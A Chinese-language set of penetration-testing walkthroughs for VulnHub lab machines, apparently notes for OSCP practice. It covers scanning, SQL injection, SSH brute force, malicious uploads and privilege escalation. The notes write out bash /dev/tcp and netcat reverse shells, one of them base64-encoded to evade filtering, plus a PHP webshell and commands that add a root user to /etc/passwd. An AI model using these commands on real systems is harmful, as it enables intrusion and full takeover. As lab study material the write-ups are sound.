“突破重围：探索OSCP渗透测试场景中的难题与解决方案“

  Linux Passwd提取

靶机地址:DC: 9 ~ VulnHub

通过Web信息收集 进入内网 提示:有Sql注入 knock或nc敲门 文件包含

进入内网收集信息 然后再次对用户进行ssh爆破

发现可疑文件

发现这个文件可执行

普通用户无权限执行

发现hydra爆破出来的ssh用户有 sudo权限

test内容为:

普通用户无法查看/etc/shadow文件

但是通过sudo配合 test文件即可

然后passwd提权即可

获取 哈希值

perl -le 'print crypt("123456","hacker")' #用户为:hacker 密码为:123456

在通过此语句写入到/tmp/1 的文件里面

echo "hacker:hazsR9UJJSGrk:0:0:hacker_lai_la:/tmp/:/bin/bash" >/tmp/1

然后查看文件内容

然后切换到hacker用户 即为root权限

SolidState 邮箱泄露导致获取shell

靶机地址:SolidState: 1 ~ VulnHub

通过谷歌搜索 以及百度搜索来利用此靶机

nmap扫描

4555端口存在泄露

telnet 192.168.52.166 4555 直连 默认用户:root 默认密码:root

修改密码后登录telnet登录110端口

看到有2个邮箱

retr 1 retr2 都看一下 第二个有用户和密码

尝试ssh连接

使用searchsploit 50347.py 漏洞 通过前期信息收集知道靶机存在JAMES 2.3.2有这个payload漏洞

渗透机监听本地5555端口

然后ssh在连接靶机 这样就无限制 因为靶机有一些限制

这样就反弹进去了

进入靶机后 进/opt 目录有一个tmp.py文件 直接修改文件即可 因为任何用户都有修改权限 他每2分钟执行一次

echo "import os;os.system('/bin/nc 192.168.52.128 9999 -e /bin/bash')" >/opt/tmp.py 直接将原有的tmp里面内容更改为我们上面输入的内容

攻击机监听9999端口 等待2分钟连接即可

Linux suid提权

靶机地址:https://www.vulnhub.com/entry/escalate_linux-1,323

通过扫描目录发现存在shell.php 提示密码为cmd

通过反弹shell来进行获取终端

/bin/bash -c 'bash -i >&/dev/tcp/192.168.52.128/5555 0>&1'

首先创建一个非终端

export TERM=xterm

使用find提权 发现存在可以文件

find / -perm -u=s -type f 2 >/dev/null

通过strings shell 来查看文件里面字符串 发现可以文件

在里面增加这3条命令

然后运行shell 会在tmp下增加一个sh文件

然后运行./sh -p 其实就是 bash -p

成功提权到root

Linux 可执行文件提权

靶机地址:hackme: 1 ~ VulnHub

最后终端结果图

首先使用nmap扫描

nmap -sV -p- --script=vuln --min-rate 1000 192.168.52.165 -sC

进行目录扫描:

靶机开启80端口进行尝试访问

尝试万能密码 万能用户无果 发现可注册用户

注册完后登录

存在sql注入 是post传参 Burpsuite抓包 然后保存到 直接sqlmap跑即可

python3 sqlmap.py -r /home/hacker/ba/sql.txt -D webapphacking -T users --dump --batch

靶机开开启一个ssh端口 把这些帐户密码收集起来 进行ssh爆破

发现ssh爆破不成功,突然发现还有一个superadmin用户 密码被加密没解出来

尝试解密:MD5免费在线解密破解_MD5在线加密-SOMD5

在此尝试ssh登录发现还是无果,然后想起Web还有一个登录界面试试能不能登录上去

登录上去之后发现有文件上传 直接文件上传 然后结合第一开始扫描到的upload目录 连接

进行反弹shell

进行提权: 尝试内核提权以及apache提权均无果后,进行suid提权

发现可疑文件 存在suid权限

查看该文件,发现存在suid 凭感觉可能是权限 然后此文件还可以运行 运行一下试试.

成功提权到root结束战斗 来自2023年6月22 端午节渗透内容.

Linux脏牛提权+配合apache2.2.15解析漏洞

靶机地址:https://www.vulnhub.com/entry/fristileaks-13,133/

脏牛地址:https://github.com/firefart/dirtycow/blob/master/README.md

通过nmap扫描以及对网页做信息收集,得到用户密码然后登录

网页首页

可能是目录直接尝试

确实是 查看源代码是否有信息 滑到地发现base64加密

为了方便直接浏览器解密

data:image/jpeg;base64,加密 直接下载

下载后的内容为:

猜测可能是密码:继续查看源代码

可能是用户

尝试登录

上传图片马即可 然后通过反弹shell到内容 最后使用脏牛提权即可.

正常bash反弹进不去

通过base64加密然后管道符bash即可

进入内容直接脏牛提权.

Tomcat渗透|kncok敲门|文件读取

靶机地址:digitalworld.local: MERCY v2 ~ VulnHub

通过nmap扫描

发现开启smb 直接enumlinux4 枚举

enumlinux4 192.168.52.173

发现3个文件共享目录

通过信息收集靶机有qiu等多个用户存在

通过Web页面得知密码是passwd 尝试

smbclient \\\\192.168.52.173\\qiu -U qiu

下载里面敏感文件

然后使用config配置文件敲开80和22端口

然后访问网页robots 发现存在如下二个目录程序

发现靶机nomercy存在rips 0.53版本

searchsploit rips 0.53 直接复制粘贴payload

文件读取成功

读取tomcat 配置文件

使用用户密码登录 然后将jsp反弹木马打包为war上传

jsp反弹shell地址:https://github.com/LaiKash/JSP-Reverse-and-Web-Shell/blob/main/shell.jsp

jar -cf shell.war reverse.jsp 打包 然后上传

nc反弹成功

接下来直接切换用户为 fluffy 密码就是之前我们在网页中读取到的

在里面追加内容 因为文件可读可写可执行

等几分钟/tmp目录下会产生sh文件

然后直接俄

./sh -p 即可到root权限

ProFTPD 1.2.10 任意文件复制

靶机地址:digitalworld.local: JOY ~ VulnHub

第一步发现主机: sudo arp-scan -l

第二步:nmap扫描端口

存在匿名用户登录 匿名登进去下载一些东西但并没有什么价值 所以这条线路行不通

searchsploit 尝试搜索漏洞 但也没有发现什么价值信息 有一个拒绝服务和枚举用户 所以这条也放弃了

发现开放80端口进行访问 发现是ossec 0.8版本

还是拒绝服务

发现存在可疑参数 尝试读取文件 也行不通 扫描目录等等都没价值信息 放弃80端口然后转为445端口枚举

enum4linux 192.168.52.174 发现3个用户

通过在搜索引擎搜索 ProFTPD 存在未授权任意文件复制 那么我们可以从这点突破 然后反弹shell

使用telnet连接 因为telnet协议是只有文本

为什么我知道/home/ftp/passwd2路径 因为enum4linux我们已经枚举到几个用户

刚好ftp对应ftp服务所以试一下就知道了

ftp连接进去查看 可以看到已经复制进来

下载计划任务 然后修改在通过任意文件复制到服务器计划任务

ftp下载

写入我们的反弹shell

先上传到ftp上 然后由ftp任意文件复制的漏洞上传到靶机

等待1分钟成功反弹shell

PHP Blog 0.4漏洞以及创建用户|文件上传

靶机地址:pWnOS: 2.0 (Pre-Release) ~ VulnHub

首先端口扫描:Nmap,Goby,masscan都可以 靶场推荐Nmap 项目实战推荐goby

看到Openssh 5.8 这个确实没洞 因为遇到好多次

看到开放25端口 查看也无结果

smtp也无结果

查看80端口 发现版本也无价值漏洞

dirsearch目录扫描后发现login 直接尝试万能密码登录

查看源代码以及其他信息后 发现并没有什么有用信息

发现blog目录

尝试访问然后查看源代码

searchsploit搜索此漏洞

然后直接使用 -e 指定利用 -U 用户名 -P 密码

回到刚才扫描到的目录直接 admin|admin 登录

登录后 这边存在一个文件上传 上传shell.php

shell.php 里面内容（<?php exec("/bin/bash -c 'bash -i >&/dev/tcp/127.0.0.1/5555 0>&1'");?>）

渗透机器监听:nc -lvp 5555

直接可以上传php 然后去/blog/images 目录去找刚才我们上传文件即可

直接就反弹shell了 因为这里我的靶机好像存在问题 所以一直没反弹shell成功 尝试了perl,python,bash,sh等反弹都不可以.琢磨了一下午最后使用杀手锏然而页面却出现了

翻译为:WARNING: Failed to daemonise. This is quite common and not fatal. No route to host (113)警告:守护进程失败。这很常见，但并不致命。没有到主机的路由(113)

所以可以看到是靶机问题.

2023年7月1日 18:05分 去吃饭咯

Linux信息收集

靶机地址:Misdirection: 1 ~ VulnHub

基本稍微有一点基础就能做出来

扫描存活网段:sudo netdiscover -r 192.168.52.1/24

扫描端口

ssh,mysql弱口令都无果

随后转到80端口上

通过浏览器插件看到 网站可能套用了CDN,所以放慢扫描速度 降低扫描

直接访问靶机8080端口debug 发现是一个终端shell 第一次遇到这种情况

发现反弹shell执行不成功,第一开始我一直以为是把我IP给办了,然后使用受害机器ping我们主机发现能通 我们还能给他通信.

通过前面收集发现网页存在cdn,也应该对反弹shell这些做了一些防护 那么我们可以用base64来进行简单的绕过

原:/bin/bash -c 'bash -i >&/dev/tcp/192.168.52.128/5555 0>&1'

编码后:echo L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mL2Rldi90Y3AvMTkyLjE2OC41Mi4xMjgvNTU1NSAwPiYxJwo=|base64 -d |bash

查看sudo权限 发现有内容 直接 sudo -u brexit /bin/bash 指定sudo内容

查看 /etc/passwd /etc/shadow 文件权限

发现用户是root 组是brexit 刚好是我们当前用户 所以直接添加内容

perl -le 'print crypt(123456,"hack")' 生成验

echo "hack:hazsR9UJJSGrk:0:0:too_hacker:/root:/bin/bash" >>/etc/passwd #追加

最后su hack 切换到hack用户 然后输入123456 即可

最后成功拿到flag

Linux锻炼思维逻辑靶场|超级超级意想不到的思路

重点:leetspeak

靶机地址:Tr0ll: 1 ~ VulnHub

收集靶机地址 arp-scan -l 以及nmap和netdiscover都可以

看个人喜好 arp-scan个人比较喜欢

netdiscover -r 192.168.52.1/24

nmap -sn 192.168.52.1/24

端口扫描:

searchsploit 版本不对应 无果

发现靶机ftp存在匿名登录

下载文件

是pcap文件 是分析数据包的 那么我们直接分析

翻阅几个包无果 突然想到strings 可以直接看 因为呈现出来的是文本

leet表达式讲解:1337语言_dgitra7963的博客-CSDN博客

直接尝试访问80端口看看

需要下载直接下载看看

下载后我们需要经典的3步骤:

查看文件类型 查看文件是否有捆绑 查看文件字符串内容

可以看到文件是一个elf文件 在Linux中是一个可执行文件

查看是否有捆绑 经过查看未发现捆绑

查看字符串发现里面并没有什么价值信息 但看到了一个找到ip地址的内容

执行完文件后发现也有这个找到地址 猜测一下 缓冲区溢出|10进制ip地址|网站目录文件

直接访问网站目录把 因为他前面就是这个 所以后面应该也差不多

把这个2个文件里面txt都下载下来 靶机开启了ssh 所以进行ssh爆破尝试

靶机应该做了一些防护 我们爆破了几次就不能枚举了 应该设置了登录次数

分段爆破:那么我们可以看到前面几个用户都没有成功,那么我们可以把后门几个未爆破的用户继续爆破

可以看到也没有成功

我们可以设想一下 目录既然有:this folder contains the password翻译为:

• 这个文件夹包含密码/ 那么文件夹里面文件名是否是文件密码呢 因为我们扫描目录以及结合网站开放端口都无果 所以抱着这个我们可以试试 可以看到已经成功

ssh连接后 伪终端

正在连接 发现以下自动退出了 里面应该有计划任务 /etc/crontab 没权限查看

那就看一下 var/log日志 或者 var/spool/cron/crontabs/

开启追踪 cronlog

查看权限 最高权限 任何人都可以执行 更改查看

直接给他更改为这个

等一会自动会执行这个文件 然后我们查看 /tmp目录是否多出一个sh文件

./sh -p 成功提权到root

小技巧: 这样sudo提权也可以

Wordpress 1.1.5-Sql注入|hashcat|hash-identified

靶机地址:https://download.vulnhub.com/hackademic/Hackademic.RTB1.zip

CMS:Wordpress 1.1.5-Sql漏洞
扫描端口
信息收集
sql注入
hash识别
hashcat使用
文件上传 
开启文件上传

提权:内核提权

首先端口扫描发现只开放一个80端口

是可以点击的,直接点击

继续点击

存在sql注入 看着cat有交互直接凭感觉来'引号报错

直接丢进sqlmap跑 或者 手工注入

手工注入:可以上网搜索wordpress数据库结构 或者 wordpress 表结构 来尝试注入

里是数字型所以不需要闭合直接注入就行